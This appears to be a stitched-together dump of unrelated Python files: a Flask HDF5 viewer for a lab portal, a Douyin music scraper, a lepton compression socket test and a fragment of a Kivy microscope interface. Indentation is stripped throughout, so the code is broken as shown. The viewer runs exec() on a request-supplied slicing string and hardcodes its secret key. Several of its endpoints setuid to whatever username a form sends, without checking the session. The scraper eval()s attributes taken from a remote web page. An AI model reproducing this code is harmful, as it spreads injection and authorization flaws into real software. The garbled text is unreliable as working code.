cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
h5nuvola.py
|
#!/usr/bin/env python
"""H5 Nuvola - VUO integration
versions:
h5py = 2.7.1
numpy = 1.13.0
json = 2.0.9
flask = 1.0.3
werkzeug = 0.15.4
bokeh = 0.13.0 -> 1.2.0
"""
import re
import requests
import urllib
import webbrowser
import multiprocessing
import os
import pwd
import json
import time
import sys
import hashlib
import ssl
import h5py as h5
import numpy as np
from flask import Flask, request, redirect, url_for, render_template, make_response, Response
from werkzeug.utils import secure_filename
from bokeh.models import ColumnDataSource, HoverTool, CustomJS
from bokeh.plotting import figure
from bokeh.embed import components, json_item
from bokeh.models.widgets import DataTable, DateFormatter, TableColumn, Dropdown, NumberFormatter
from bokeh.colors import RGB
from bokeh.layouts import widgetbox
from bokeh.palettes import Greys
from bokeh.resources import INLINE
from bokeh.core.properties import Dict
##########################################################################
#
# Global variables
#
# Load config file
with open('./h5nuvola.config') as json_config:
config_dict = json.load(json_config)
# VUO lab hash
vlab_hash = str(config_dict.get("vlab_hash"))
# https connection certificates | ssl_context
has_ssl_context = config_dict.get("has_ssl_context")
locations_crt = str(config_dict.get("locations_crt"))
users_nuvola_crt = str(config_dict.get("users_nuvola_crt"))
users_nuvola_key = str(config_dict.get("users_nuvola_key"))
# Flask app.run configuration
host = str(config_dict.get("host"))
port = config_dict.get("port")
debug = config_dict.get("debug")
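# For reference, a hypothetical ./h5nuvola.config covering the keys read above
# (all values below are placeholders, not the real deployment settings):
#
# {
#     "vlab_hash": "0123456789abcdef",
#     "has_ssl_context": true,
#     "locations_crt": "/etc/ssl/certs/locations.crt",
#     "users_nuvola_crt": "/etc/ssl/certs/users_nuvola.crt",
#     "users_nuvola_key": "/etc/ssl/private/users_nuvola.key",
#     "host": "0.0.0.0",
#     "port": 5000,
#     "debug": false
# }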
# jQuery File Tree
fnfilter = lambda fn: True
dfilter = lambda d: True
extension_filter = ['.h5', '.hdf5'] # select desired file extensions to show | '*.*' for all extensions
# h5 files manipulation
hf_dict = {} # dictionary object to store h5 file object, items, attributes and properties
hf_objects = []
##########################################################################
#
# Python auxiliary methods for the file browser and h5 file manipulation
#
# Routine for remote file browsing
def get_files_target(d, fnfilter, dfilter, rel, user_name, queue):
fns_dirs_queue = {}
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
d = os.path.expanduser(d)
dirs = []
fns = []
for fn in sorted(os.listdir(d)):
ffn = os.path.join(d, fn)
if not rel:
fn = ffn
if os.path.isdir(ffn):
if dfilter(ffn):
dirs.append(fn)
else:
if fnfilter(ffn):
if extension_filter == ['*.*']:
fns.append(fn)
else:
if os.path.splitext(fn)[1] not in extension_filter:
pass
else:
fns.append(fn)
fns_dirs_queue["fns"] = fns
fns_dirs_queue["dirs"] = dirs
queue.put(fns_dirs_queue)
except Exception as E:
print('Could not load directory: %s' % str(E))
fns_dirs_queue["exception"] = E
queue.put(fns_dirs_queue)  # report the failure so the parent process is not left waiting on the queue
# Read h5 files and retrieve children objects from the root group
def read_h5_target(filepath, user_name, queue):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
hf_dict = {}
hf_dict[filepath] = {}
try:
with h5.File(filepath) as hf:
# collect objects to render on template
hf_name = str(hf.filename).split('/')[-1]
hf_dict[filepath]['hf_name'] = hf_name
hf_objects = []
hf.visititems(hf_visit) # update hf_objects
hf_dict[filepath]['hf_objects'] = hf_objects
root_attrs=[]
if hf.attrs.keys() == []: # if there are no attributes
pass
else:
for key in hf.attrs.keys():
root_attrs.append([key, hf.attrs[key]])
hf_dict[filepath]['root_attrs'] = root_attrs
root_properties = [ hf_name, 'group', root_attrs, True, 'Group size', str(len(hf.items())) ]
hf_dict[filepath]['root_properties'] = root_properties
hf_root_items = get_hf_items(hf.items())
hf_dict[filepath]['hf_root_items'] = hf_root_items
hf_new_items = [[str(0)]]
hf_dict[filepath]['hf_new_items'] = hf_new_items
hf.close()
queue.put(hf_dict) # send content back to the parent process
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
# Expand h5Tree
def expand_tree_target(user_name, filepath, node_selected, queue):
global hf_objects
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
with h5.File(filepath) as hf:
hf_objects = []
hf.visititems(hf_visit)
for obj in hf_objects:
if str(obj.name) == node_selected:
if len(obj.items()) != 0:
hf_new_items = get_hf_items(obj.items())
else:
hf_new_items = [[str(1)]]
queue.put(hf_new_items) # send content back to parent process
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
# Called by expand_tree_target
def hf_visit(name, obj):
global hf_objects
hf_objects.append(obj)
# Retrieve attributes, type (group or dataset), children, dtype and dshape from h5 objects
def get_hf_items(items):
l = []
for item in items:
attrs = []
tp = ''
children = None
dtype = ''
dshape = ''
if item[1].attrs.keys() == []: # if there are no attributes
pass
else:
for key in item[1].attrs.keys():
if type(item[1].attrs[key]) == type(np.zeros((0,1))): # if the attribute is an array
attrs.append([key, str(item[1].attrs[key])]) # convert attribute to str
else:
attrs.append([key, item[1].attrs[key]])
if type(item[1]) == h5._hl.dataset.Dataset:
if h5.check_dtype(vlen=item[1].dtype) == str:
dtype = 'string'
else:
dtype = str(item[1].dtype)
dshape = str(list(item[1].shape))
tp = 'dataset'
children = False
else:
tp = 'group'
dtype = 'Group size'
dshape = str(len(item[1].items()))
if len(item[1].items()) == 0:
children = False
else:
children = True
l.append( [str(item[1].name), #0
tp, #1
attrs, #2
children, #3
dtype, #4
dshape] ) #5
return l
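# Each entry of the returned list looks like, e.g.
# ['/entry/data', 'dataset', [['units', 'counts']], False, 'float64', '[1024, 1024]']
# (name, type, attributes, has-children flag, dtype, shape -- values illustrative).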
##########################################################################
#
# Bokeh plotting routines - raw, curve and image
#
def create_bokeh_tools():
bokeh_tools = ["pan","wheel_zoom","box_zoom","reset","save","box_select"]
hover = HoverTool(tooltips=[
("pixel_value", "@image{0.00}"),
("point_value", "$y{0.00}"),
("(x,y)", "($x{0.},$y{0.})"),
])
bokeh_tools.append(hover)
return bokeh_tools
def bokeh_to_json_item(items):
bokeh_json_items = [json_item(item) for item in items]
return bokeh_json_items
def bokeh_table_target(user_name, filepath, dataset_name, queue):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
with h5.File(filepath) as hf:
data = hf[dataset_name][()]
if type(data) == str: # String dataset
table = dict(x=[data])
columns = [
TableColumn( field='x', title='0', width=400, sortable=False )
]
width=400
height=200
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
width=width, height=height,
selectable=True, sortable=False)
# convert bokeh model obj into json_item to be embedded in HTML
bokeh_json_item_tables = bokeh_to_json_item([data_table])
# send data back to parent process through the queue
queue.put(bokeh_json_item_tables)
else:
if data.ndim == 0: # Scalar dataset
table = dict( x=[data] )
columns = [
TableColumn( field='x', title='0', width=100,
sortable=False, formatter=NumberFormatter(format="0,0.0000000000") )
]
width=200
height=200
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
width=width, height=height,
selectable=True, sortable=False)
bokeh_json_item_tables = bokeh_to_json_item([data_table])
queue.put(bokeh_json_item_tables)
elif data.ndim == 1: # 1D dataset
table = dict( x=data.tolist() )
columns = [
TableColumn( field='x', title='0', width=100,
sortable=False, formatter=NumberFormatter(format="0,0.0000000000") )
]
width=200
height=800
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
width=width, height=height,
selectable=True, sortable=False)
bokeh_json_item_tables = bokeh_to_json_item([data_table])
queue.put(bokeh_json_item_tables)
elif data.ndim == 2: # 2D dataset
table = {}
i = 0
columns = []
for column in data.transpose():
table.update({str(i):column})
columns.append( TableColumn( field=str(i), title=str(i), width=100,
sortable=False, formatter=NumberFormatter(format="0,0.0000000000") ) )
i = i + 1
width=800
height=800
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
## width=width, height=height,
selectable=True, sortable=False, editable=False)
bokeh_json_item_tables = bokeh_to_json_item([data_table])
queue.put(bokeh_json_item_tables)
elif data.ndim == 3: # 3D dataset
tables = []
for i in np.arange(0,data.shape[2]):
table = {}
j = 0
columns = []
for column in data[:,:,i].transpose():
table.update({str(j):column})
columns.append( TableColumn( field=str(j), title=str(j), width=100, sortable=False ) )
# print "table i=%d, j=%d"%(i, j)
j = j + 1
width = 800
height = 800
table_source = ColumnDataSource(table)
data_table = DataTable(source=table_source, columns=columns,
fit_columns=False, sizing_mode="scale_width",
width=width, height=height,
selectable=True, sortable=False)
tables.append(data_table)
bokeh_json_item_tables = bokeh_to_json_item(tables)
queue.put(bokeh_json_item_tables)
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
def bokeh_plot_target(user_name, filepath, dataset_name, queue):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
with h5.File(filepath) as hf:
data = hf[dataset_name][()]
if data.ndim == 0:
bokeh_tools = create_bokeh_tools()
y=[data]
x=[0]
source = ColumnDataSource(data=dict(x=x, y=y))
plot = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", tools=bokeh_tools)
plot.line('x', 'y', source=source, legend=dataset_name.split('/')[-1],
line_width=3, line_alpha=0.6, line_color=RGB(0,158,234))
plot.circle('x', 'y', source=source, fill_color="white", size=10)
bokeh_json_item_plots = bokeh_to_json_item([plot])
queue.put(bokeh_json_item_plots)
elif data.ndim == 1:
bokeh_tools = create_bokeh_tools()
y = data
x = np.arange(data.shape[0])
source = ColumnDataSource(data=dict(x=x, y=y))
plot = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", tools=bokeh_tools)
plot.line('x', 'y', source=source, legend=dataset_name.split('/')[-1],
line_width=3, line_alpha=0.6, line_color=RGB(0,158,234))
plot.circle('x', 'y', source=source, fill_color="white", size=10)
bokeh_json_item_plots = bokeh_to_json_item([plot])
queue.put(bokeh_json_item_plots)
elif data.ndim == 2:
plots = []
i = 0
for p in data:
bokeh_tools = create_bokeh_tools()
y = p
x = np.arange(p.shape[0])
source = ColumnDataSource(data=dict(x=x, y=y))
p = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", tools=bokeh_tools)
p.line('x', 'y', source=source, legend=dataset_name.split('/')[-1],
line_width=3, line_alpha=0.6, line_color=RGB(0,158,234))
p.circle('x', 'y', source=source, fill_color="white", size=10)
plots.append(p)
print str(i)
i += 1
bokeh_json_item_plots = bokeh_to_json_item(plots)
queue.put(bokeh_json_item_plots)
elif data.ndim == 3:
print "3D data"
# Try plotly 3D scatter, 3D isosurface,
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
def bokeh_image_target(user_name, filepath, dataset_name, queue):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
with h5.File(filepath) as hf:
data = hf[dataset_name][()]
if data.ndim == 2:
bokeh_tools = create_bokeh_tools()
plot = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", aspect_ratio=1.5, tools=bokeh_tools,
max_height=1200, # height_policy="fit",
max_width=1500, # width_policy="fit",
x_range=(0,data.shape[0]), y_range=(0,data.shape[1]))
plot.image(image=[data], x=0, y=0, dw=data.shape[0], dh=data.shape[1])
bokeh_json_item_images = bokeh_to_json_item([plot])
queue.put(bokeh_json_item_images)
elif data.ndim == 3:
if 1 in data.shape: # one of the dimensions are 1, means it is a 2D image
ind = data.shape.index(1)
if ind == 0:
new_shape = (data.shape[1], data.shape[2])
elif ind == 1:
new_shape = (data.shape[0], data.shape[2])
else:
new_shape = (data.shape[0], data.shape[1])
data = data.reshape(new_shape)
bokeh_tools = create_bokeh_tools()
plot = figure(title=dataset_name.split('/')[-1], toolbar_location="above",
sizing_mode="scale_both", aspect_ratio="auto", height_policy="fit", tools=bokeh_tools,
x_range=(0,data.shape[0]), y_range=(0,data.shape[1]))
plot.image(image=[data], x=0, y=0, dw=data.shape[0], dh=data.shape[1])
bokeh_json_item_images = bokeh_to_json_item([plot])
queue.put(bokeh_json_item_images)
else:
pass
# Embed Plotly in HTML
# https://blog.heptanalytics.com/2018/08/07/flask-plotly-dashboard/
# Try plotly 3D surface, 3D volume
except IOError:
print "IOError: user %s can't read file %s"%(user_name, filepath)
##########################################################################
#
# VUO auxiliary functions - vuo id, vlab function call
#
def get_vuo_user(cookie):
vuo_function = 'https://vuo.elettra.eu/pls/vuo/vuo_sso.detail' # PL SQL function
r = requests.get(vuo_function, params={'cookie': cookie , 'what_detail': 'unix'})
response = str(r.text)[:-1] # exclude '\n' at the end of the string
response = response.split(':') # take each field of the response, convert to a list
print(response)
if response[0] == 'OK':
response_dic = {
'status': response[0],
'vuo_user_id': response[1],
'unix_user_name': response[2],
'unix_user_id': response[3],
'unix_group_id': response[4]
}
else:
response_dic = {
'status': response[0],
'redirect_url': ':'.join(response[1:3]).replace('trieste.it', 'eu')
}
return response_dic
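# For reference, the colon-separated reply parsed above has one of two shapes
# (field order inferred from the parsing code, values illustrative):
#   'OK:<vuo_user_id>:<unix_user_name>:<unix_user_id>:<unix_group_id>'
#   '<status>:<redirect_url>'  -- any status other than 'OK'; the URL's own ':' is re-joined above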
def vlab_call(vuo_user_id, investigation_id ):
vlab_hash_digested = hashlib.sha1(vlab_hash + vuo_user_id + investigation_id).hexdigest()
vlab_function = 'https://vuo.elettra.eu/pls/vuo/vlab.sm_get_investigation_info'
r = requests.get(vlab_function, params={'FRM_HASH':vlab_hash_digested,
'FRM_USR_ID':vuo_user_id,
'FRM_INVESTIGATION_ID':investigation_id})
response = str(r.text)[:-1] # exclude '\n' at the end of the string
response = response.split(':')
if response[0] == 'OK':
unix_user_id = response[1].split('/')[0] # retrieve unix_user_id
unix_user_name = pwd.getpwuid(int(unix_user_id)).pw_name # 'name.surname'
h5nuvola_user_name = unix_user_name.replace('.', ' ').title() # 'Name Surname'
base_dir = "/" + "/".join(response[1].split('/')[1::]) # retrieve base dir path to browse
response_dic = {
'status': response[0],
'unix_user_id': unix_user_id,
'unix_user_name': unix_user_name,
'h5nuvola_user_name': h5nuvola_user_name,
'base_dir': base_dir
}
else:
response_dic = {
'status': response[0],
'message': response[1]
}
return response_dic
##########################################################################
#
# Flask app config
#
app = Flask(__name__)
app.secret_key = 'some super secret key here'
##########################################################################
#
# Flask app routes/endpoints - remote browser, h5 visualisation, plotting
#
@app.route('/test')
def test():
return render_template('h5nuvola_web_interface.html')
# VUO vlab link will call this endpoint
@app.route('/h5nuvola/vlab/<investigation_id>')
def vlab_verify(investigation_id):
# Get vuo_session cookie from flask 'request' global context variable
try:
cookies = str(request.headers['Cookie'])
if ";" in cookies: # check if there are more than one cookie set
print "More than one cookie"
print cookies
cookies = cookies.split(';')
print cookies
for cookie in cookies:
if "vuo_session" in cookie:
vuo_session_cookie = cookie.strip().split('=')[-1]
else:
print "Single cookie"
vuo_session_cookie = cookies.split('=')[-1]
response_vuo = get_vuo_user(vuo_session_cookie)
if response_vuo['status'] == 'OK':
print("Valid session on VUO!")
vuo_user_id = response_vuo['vuo_user_id']
response_vlab = vlab_call(vuo_user_id, investigation_id)
if response_vlab['status'] == 'OK':
return render_template("h5nuvola_web_interface.html",
UNIX_USER_NAME=json.dumps(response_vlab['unix_user_name']),
H5NUVOLA_USER_NAME=json.dumps(response_vlab['h5nuvola_user_name']),
BASE_DIR=json.dumps(response_vlab['base_dir']),
INVESTIGATION_ID=json.dumps(investigation_id))
else:
return response_vlab['message'][0:-1] + " to access investigation ID " + investigation_id
else:
print("NOT a valid session on VUO! Please log in.")
print(response_vuo['redirect_url'])
return redirect(response_vuo['redirect_url'] +
urllib.quote('https://users-nuvola.elettra.eu/h5nuvola/vlab/' +
investigation_id))
except KeyError: # Could not find Cookie in the headers
return "Could not verify if user is logged in VUO. Please log in and try again."
# endpoint called every time a folder is clicked in the jQuery FileTree app
@app.route('/sfiles/<unix_user_name>', methods=["GET", "POST"])
def sfiles(unix_user_name):
r = []
d = urllib.unquote(request.form.get('dir', './'))
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=get_files_target,
args=(d,
fnfilter,
dfilter,
True,
unix_user_name,
queue)
)
p.start()
fns_dirs_queue = queue.get()
p.join()
# user can't read the directory requested
if "exeception" in fns_dirs_queue.keys():
print("\n\n Exception \n\n")
r.append('Could not load directory: %s' % (str(fns_dirs_queue["exception"])))
else:
fns, dirs = fns_dirs_queue["fns"], fns_dirs_queue["dirs"]
r = ['<ul class="jqueryFileTree" style="display: none;">']
for f in dirs:
ff = os.path.join(d, f)
r.append('<li class="directory collapsed">' \
'<a href="#" rel="%s/">%s</a></li>' % (ff, f))
for f in fns:
ff = os.path.join(d, f)
e = os.path.splitext(f)[1][1:] # get .ext and remove dot
r.append('<li class="file ext_%s">' \
'<a href="#" rel="%s">%s</a></li>' % (e, ff, f))
r.append('</ul>')
resp = Response(''.join(r))
# resp.headers['Access-Control-Allow-Origin'] = "*"
return resp
# Load h5 files
@app.route('/loadH5File', methods=['POST'])
def loadH5File():
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
# read file using multiprocessing
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=read_h5_target, args=(filepath, user_name, queue))
p.start()
p.join() # here I must call join before queue.get(), not clear why ...
hf_dict = queue.get()
return json.dumps({'filepath':filepath,
'hf_name':hf_dict[filepath]['hf_name'],
'hf_root_items':hf_dict[filepath]['hf_root_items'],
'hf_new_items':hf_dict[filepath]['hf_new_items'],
'root_properties':hf_dict[filepath]['root_properties']
})
# Close h5 file -> delete node from tree, remove dictionary key and content of selected file
@app.route('/closeH5File', methods=['POST'])
def closeH5File():
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
return ''
# Expand/Update the h5 Tree
@app.route('/h5TreeUpdate', methods=['POST', 'GET'])
def h5TreeUpdate():
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
node_selected = str(request.form['node']).strip()
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=expand_tree_target,
args=(user_name,
filepath,
node_selected,
queue)
)
p.start()
hf_new_items = queue.get()
p.join()
return json.dumps({'filepath': filepath,
'hf_new_items':hf_new_items
})
@app.route('/raw', methods=['GET', 'POST'])
def raw():
if request.method == 'POST':
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
node_selected = str(request.form['node']).strip()
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=bokeh_table_target,
args=(user_name,
filepath,
node_selected,
queue)
)
p.start()
bokeh_json_item_tables = queue.get()
p.join() # here I must call join after queue.get(), not clear why ...
return json.dumps(bokeh_json_item_tables)
@app.route('/curve', methods=['GET', 'POST'])
def curve():
if request.method == 'POST':
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
node_selected = str(request.form['node']).strip()
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=bokeh_plot_target,
args=(user_name,
filepath,
node_selected,
queue)
)
p.start()
bokeh_json_item_plots = queue.get()
p.join() # here I must call join after queue.get(), not clear why ...
return json.dumps(bokeh_json_item_plots)
@app.route('/image', methods=['GET', 'POST'])
def image():
if request.method == 'POST':
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
node_selected = str(request.form['node']).strip()
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=bokeh_image_target,
args=(user_name,
filepath,
node_selected,
queue)
)
p.start()
bokeh_json_item_images = queue.get()
p.join() # here I must call join after queue.get(), not clear why ...
return json.dumps(bokeh_json_item_images)
@app.route('/logout', methods=['GET','POST'])
def logout():
user_name = str(request.form['username']).strip()
return ''
# return redirect('https://vuo.elettra.eu/pls/vuo/guest.startup')
def geth5dset_target( user_name, queue, h5fn, dsetname, slicing='[:]' ):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
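# build and exec a one-line 'with' statement so the slicing suffix
# (e.g. '[:]' or '[0:10]') is applied verbatim to the selected dataset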
exec( 'with h5.File(h5fn) as hf: d = hf[ dsetname ]%s'%slicing )
data = {'dbytes':d.tobytes(),
'dinfo':{'Content-type': 'application/octet-stream',
'shape': d.shape,
'dtype': d.dtype}
}
queue.put(data)
except Exception as ex:
data = {'dbytes':"An exception of type %s occurred: %s"%(ex.__class__.__name__, ex.args),
'dinfo':{'Content-type': 'application/octet-stream',
'shape': '',
'dtype': ''}
}
queue.put(data)
def parsepathstr( pathstr, h5ext='.h5' ):
h5fn = '/' + pathstr.rsplit(h5ext,1)[0] + h5ext
dsetnameslicing = pathstr.rsplit(h5ext,1)[-1]
dsetname = dsetnameslicing.split('[',1)[0]
slicing = dsetnameslicing.replace(dsetname,'')
if slicing == '' :
slicing = '[:]'
return h5fn, dsetname, slicing
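# Example (illustrative): for the path string
#   'data/run01.h5/entry/detector/data[0:10,:]'
# parsepathstr() returns
#   ('/data/run01.h5', '/entry/detector/data', '[0:10,:]')
# and falls back to '[:]' (the whole dataset) when no slicing suffix is present.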
@app.route('/h5data/<path:filepath>', methods=['POST'])
def h5data(filepath):
# get HDF5 file extension
h5ext = str(request.form['ext']).strip()
# get vuo session from POST request
vuo_session_cookie = str(request.form['vuotoken']).strip()
# verify if vuo session is valid
response_vuo = get_vuo_user(vuo_session_cookie)
if response_vuo['status'] == 'OK': # if valid vuo session, retrieve data
user_name = response_vuo['unix_user_name']
h5fn, dsetname, slicing = parsepathstr( filepath, h5ext=h5ext )
# check slicing string with regex
# r = re.search('^\[(?:-?\d)*:(?:-?\d)*(?:,\s?(?:-?\d)*:(?:-?\d)*)*\]$',
# slicing)
r = re.search('^\[(?:-?\d)*:?(?:-?\d)*(?:,\s?(?:-?\d)*:?(?:-?\d)*)*\]$',
slicing)
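# the pattern above accepts plain start/stop slices, e.g. '[:]', '[0:100]' or
# '[0:10, 0:10]', and rejects anything else (strided slices such as '[::2]', letters, ...)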
if r: # if it matches the expected pattern
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=geth5dset_target,
args=(user_name,
queue,
h5fn,
dsetname,
slicing)
)
p.start()
data = queue.get() # {'dbytes':dbytes, 'dinfo':{} }
p.join()
resp = Response(data['dbytes']) # response content
resp.headers['Content-type'] = data['dinfo']['Content-type']
resp.headers['shape'] = data['dinfo']['shape']
resp.headers['dtype'] = data['dinfo']['dtype']
return resp
else:
resp = Response("NOT a valid slicing string!")
return resp
else:
print("NOT a valid session on VUO! Please log in.")
resp = Response("NOT a valid session on VUO! Please log in.")
return resp
##########################################################################
#
# Configure https/certificate | ssl_context
#
if has_ssl_context:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_verify_locations(locations_crt)
context.load_cert_chain(users_nuvola_crt, users_nuvola_key)
else:
context = None
app.run(host=host, port=port, debug=debug, ssl_context=context)
|
DouYinHotMusic.py
|
# -*- coding: utf-8 -*-
# @Author : 王翔
# @JianShu : 清风Python
# @Date : 2019/7/31 23:25
# @Software : PyCharm
# @version :Python 3.7.3
# @File : DouYinMusic.py
import os
from bs4 import BeautifulSoup
import threading
import time
# regular expressions, used for pattern matching
import re
# requests, the well-known HTTP library
import requests
class DouYinMusic:
def __init__(self):
self.music_list = []
self.path = self.download_path()
@staticmethod
def download_path():
"""
获取代码执行目录,并在目录下创建Music文件夹
:return Music文件夹全路径
"""
base_dir = os.path.dirname(os.path.abspath(__file__))
_path = os.path.join(base_dir, "Music")
if not os.path.exists(_path):
os.mkdir(_path)
print(_path)
return _path
def get_request(self, url):
"""
封装requests.get方法
如果为网页请求,返回网页内容
否则,解析音乐地址,并返回音乐二进制文件
:param url: 请求url(分网页、音乐两类)
:return: 网页内容 & 音乐二进制文件
"""
r = requests.get(url, timeout=5)
if url.endswith('html'):
return r.text
else:
return r.content
def analysis_html(self, html):
"""
根据获取的网页内容,解析音乐名称、下载地址
调用音乐下载方法
:param html: 网页内容
"""
soup = BeautifulSoup(html, 'lxml')
# locate every download link via its onclick attribute
for tag_a in soup.findAll('a', attrs={'onclick': True}):
# the onclick payload looks like '("name","link","")'; eval turns the str into a tuple
link_list = eval(tag_a['onclick'][5:])
music_name, music_link = link_list[:2]
# some tracks appear more than once, so skip music that was already downloaded
if music_name in self.music_list:
continue
self.music_list.append(music_name)
t = threading.Thread(target=self.download_music, args=(music_name, music_link))
time.sleep(0.5)
t.start()
def download_music(self, music_name, music_link):
"""
解析音乐文件,完成音乐下载
:param music_name: 音乐名称
:param music_link: 下载地址
"""
_full_name = os.path.join(self.path, music_name)
with open(_full_name + '.mp3', 'wb') as f:
f.write(self.get_request(music_link))
print("抖音音乐:{} 下载完成".format(music_name))
def run(self):
"""
主方法,用于批量生成url
"""
for page in range(1,55):
url = "http://douyin.bm8.com.cn/t_{}.html".format(page)
html = self.get_request(url)
self.analysis_html(html)
if __name__ == '__main__':
main = DouYinMusic()
main.run()
def getWeiXinAppStoreInfo():
url = "http://itunes.apple.com/cn/lookup?id=414478124"
# the URL below does not return anything of much value
# url = "https://apps.apple.com/cn/app/%E5%BE%AE%E4%BF%A1/id414478124"
# response from the request
response = requests.get(url)
# text of the response page
text = response.text
print(text)
def getPages() -> int:
url = "有效网址"
# 请求回来的响应
response = requests.get(url)
# 响应的网页字符串
text = response.text
# 获取网页字符串中匹配的信息
result = re.findall(r'>第 1 页,共 ([1-9]\d+) 页</span>', text, re.I)
# 返回结果的第一次出现的值,也就是总页数
return int(result[0])
|
sockettester.py
|
#!/usr/bin/env python
import subprocess
import sys
import threading
import socket
import time
import os
import uuid
import argparse
import zlib
base_dir = os.path.dirname(sys.argv[0])
parser = argparse.ArgumentParser(description='Benchmark and test socket server for compression')
parser.add_argument('files', metavar='N', type=str, nargs='*', default=[os.path.join(base_dir,
"..", "images", "iphone.jpg")])
parser.add_argument('--benchmark', dest='benchmark', action='store_true')
parser.add_argument('--bench', dest='benchmark', action='store_true')
parser.add_argument('-benchmark', dest='benchmark', action='store_true')
parser.add_argument('-bench', dest='benchmark', action='store_true')
parser.add_argument('--singlethread', dest='singlethread', action='store_true')
parser.add_argument('-singlethread', dest='singlethread', action='store_true')
parser.set_defaults(benchmark=False)
parser.set_defaults(singlethread=False)
parsed_args = parser.parse_args()
jpg_name = parsed_args.files[0]
def read_all_sock(sock):
datas = []
while True:
try:
datas.append(os.read(sock.fileno(), 1048576))
if len(datas[-1]) == 0:
break
except OSError:
pass
return b''.join(datas)
def test_compression(binary_name, socket_name = None, too_short_time_bound=False, is_zlib=False):
global jpg_name
custom_name = socket_name is not None
xargs = [binary_name,
'-socket',
'-timebound=10ms' if too_short_time_bound else '-timebound=50000ms',
'-preload']
if socket_name is not None:
xargs[1]+= '=' + socket_name
if parsed_args.singlethread:
xargs.append('-singlethread')
proc = subprocess.Popen(xargs,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
try:
socket_name = proc.stdout.readline().strip()
if custom_name:
# test that we are unable to connect to the subprocess
dup_proc = subprocess.Popen(xargs,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
duplicate_socket_name = b''
duplicate_socket_name = dup_proc.stdout.readline().strip()
assert (not duplicate_socket_name)
if is_zlib:
socket_name = socket_name.replace(b'.uport', b'') + b'.z0'
with open(jpg_name, 'rb') as f:
jpg = f.read()
def encoder():
try:
lepton_socket.sendall(jpg)
lepton_socket.shutdown(socket.SHUT_WR)
except EnvironmentError:
pass
def decoder():
try:
lepton_socket.sendall(dat)
lepton_socket.shutdown(socket.SHUT_WR)
except EnvironmentError:
pass
t=threading.Thread(target=encoder)
encode_start = time.time()
lepton_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
lepton_socket.connect(socket_name)
t.start()
dat = read_all_sock(lepton_socket)
encode_end = time.time()
lepton_socket.close()
t.join()
print ('encode time ',encode_end - encode_start)
print (len(jpg),len(dat))
while True:
v=threading.Thread(target=decoder)
decode_start = time.time()
lepton_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
os.listdir('/tmp')
lepton_socket.connect(socket_name)
v.start()
decode_mid = time.time()
ojpg = read_all_sock(lepton_socket)
decode_end = time.time()
lepton_socket.close()
v.join()
if is_zlib:
ojpg = zlib.decompress(ojpg)
print (len(ojpg))
print (len(jpg))
assert (ojpg == jpg)
print ('decode time ',decode_end - decode_start, '(', decode_mid-decode_start,')')
if not parsed_args.benchmark:
break
print ('yay',len(ojpg),len(dat),len(dat)/float(len(ojpg)), 'parent pid is ',proc.pid)
finally:
proc.terminate()
proc.wait()
assert (not os.path.exists(socket_name))
has_avx2 = False
try:
cpuinfo = open('/proc/cpuinfo')
has_avx2 = 'avx2' in cpuinfo.read()
except Exception:
pass
if has_avx2 and os.path.exists('lepton-avx'):
test_compression('./lepton-avx')
elif parsed_args.benchmark:
test_compression('./lepton')
if not parsed_args.benchmark:
test_compression('./lepton')
test_compression('./lepton', is_zlib=True)
test_compression('./lepton', '/tmp/' + str(uuid.uuid4()))
test_compression('./lepton', '/tmp/' + str(uuid.uuid4()), is_zlib=True)
ok = False
try:
test_compression('./lepton', '/tmp/' + str(uuid.uuid4()), True)
except (AssertionError, EnvironmentError):
ok = True
finally:
assert (ok and "the time bound must stop the process")
print ("SUCCESS DONE")
|
userInterface.py
|
# Authors: Cicely Motamedi, Adam Robinson
# Description: This file contains the main code for the microscope user interface.
# Some of the more complicated functionality is found in other files.
from kivy.app import App
from kivy.uix.scatter import Scatter
from kivy.uix.label import Label
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.textinput import TextInput
from kivy.uix.accordion import Accordion, AccordionItem
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.image import AsyncImage
from kivy.uix.slider import Slider
